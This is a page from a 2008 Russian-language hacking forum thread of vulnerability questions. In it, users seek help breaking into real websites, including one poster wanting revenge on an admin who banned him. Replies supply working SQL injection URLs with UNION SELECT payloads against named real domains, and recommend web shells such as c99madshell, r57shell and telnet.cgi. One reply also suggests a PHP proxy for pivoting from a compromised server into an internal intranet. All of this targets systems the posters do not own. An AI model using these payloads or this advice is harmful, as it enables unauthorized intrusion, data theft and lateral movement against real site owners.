Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sher_or_wer

    sher_or_wer New Member

    Joined:
    13 Aug 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Народ help плиз. Вообщем тема такая на одном сервере *nix я залил shell но доступ имею только к своей папке и всё большинство опций разрешено, но я так как новичек не шибко могу сам пользоваться командами так как незнаю, я проверил все программы на уязвимость но админ следит за апргрейдами и постоянно обновляет. Я всегда пользовался эксплоитами и этого хватало пока, но теперь что делать только через брут или можно попробовать какие либо команды.
    З.Ы. К папке этого пользователя под кем я зашел имею полный доступ.
     
  2. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Попробуй cgi шелл .. (теги: telnet.cgi)
     
  3. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    Помогите найти админку на сайте gta.com.ua
     
  4. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Вероятнее всего вот она...
    http://gta.co.ua/admin/
    но доступ закрыт, может по айпи
     
    1 person likes this.
  5. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    Врядли, мне надо куда то логин и пароль ввести, на форум не проходит, должна быть админка где нужна авторизация
     
    1 person likes this.
  6. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    Да ё моё, неужели никто из античата неможет найти эту грёбанную админку, с её грёбанным администратором который меня гад забанил, да ещё и нахомил, да ещё ина Sa.mp непускает
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Послушай, дружище, сдесь не базар. Если ты не умеешь читать, то никто не виноват, а если ты будешь так себя вести, то скоро и помогать перестанут

    Red_Red1 тебе помоему дал линк, что по твоему это такое? просто тупо папка к которой закрыт доступ? Или если для тебя нет формы для ввода это не админка?

    И даже если это не она, не надо тут голосить, тебе никто ничего не должен
     
    #2987 Kakoytoxaker, 19 Aug 2008
    Last edited: 19 Aug 2008
    1 person likes this.
  8. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    Я просто прошу помощи, и читать я умею, EX me, просто админ ОЧЕНЬ плохой человек, но раз по IP админка, проксик не помогает, то как быть, как получить доступ то? сплоитов под форум тоже нету, по крайней мере не в привате
     
  9. sher_or_wer

    sher_or_wer New Member

    Joined:
    13 Aug 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Спасибо за помощь BlackSun. На сервер залил telnet.cgi. Но вот тема какая я с командной строкой тяжело общаюсь пока. Я полазил по серверу доступ увеличился чуть-чуть, но я незнаю где можно посмотреть логи и т.д. и т.п. посоветуйте плиз или ссылку дайте буду очень благодарен.


    Да и кстати мне интересно кто-нидь когда-нидь писал руководства к шеллам или все начинающие методом тыка пользуется, если есть ссылки дайте плиз, а то шеллов много а какие для чего понятия не имею.
     
    #2989 sher_or_wer, 19 Aug 2008
    Last edited: 19 Aug 2008
  10. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://trinitysquarevideo.com/exhibition.php?id=%27
    помогите разобраться, на разные запросы никак не реагирует, по моему фильтрация какая то.как её обойти?
     
  11. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Просто не ставь в конце /*
    http://trinitysquarevideo.com/exhibition.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10
     
    1 person likes this.
  12. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

    _http://www.itouch.ru/price.asp?r=261'
     
  13. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5

    используй c99madshell, только для начала в через блокнот открой и впиши логин и пасс, или r57shell а руководство мало кто делает, да и то если только для себя в качестве перевода
     
  14. serfertty

    serfertty Guest

    Reputations:
    0
    Нету здесь скули
     
    #2994 serfertty, 19 Aug 2008
    Last edited by a moderator: 19 Aug 2008
  15. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    http://gta.co.ua/file_sa_details.phtml?id=-1+union+select+1,2,3,4,5,6,7,user(),database(),version(),11,12,13,14,15,16,17,18,19,20/*
     
  16. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    через сервер с c99madshell - на http ресурсы интранета

    Здравствуйте! :)

    Подскажите:

    залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

    Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

    Или как-то ещё можно попасть на http интранета?


    Спасибо! :)
     
  17. sher_or_wer

    sher_or_wer New Member

    Joined:
    13 Aug 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Остальные шеллы не дают просматривать папки к которым я якобы имею доступ, но telnet.cgi даёт, но увы только через командную строку. Может кто знает аналоги его, но более усовершенственные.
     
  18. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    А какая религия запрещает изучить командную строку?
     
  19. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    поставь проксю :) https://sourceforge.net/projects/phpproxy/

    или можешь настроить редирект
     
    #2999 nicusor, 20 Aug 2008
    Last edited: 20 Aug 2008
  20. sher_or_wer

    sher_or_wer New Member

    Joined:
    13 Aug 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    дело не в командной строке я ее знаю более или менее. Человек всегда ищет легкие решения для своих проблем.

    З.Ы. По советуйце где есть информация о расположении папок в nix системах.
     
    #3000 sher_or_wer, 20 Aug 2008
    Last edited: 20 Aug 2008
Thread Status:
Not open for further replies.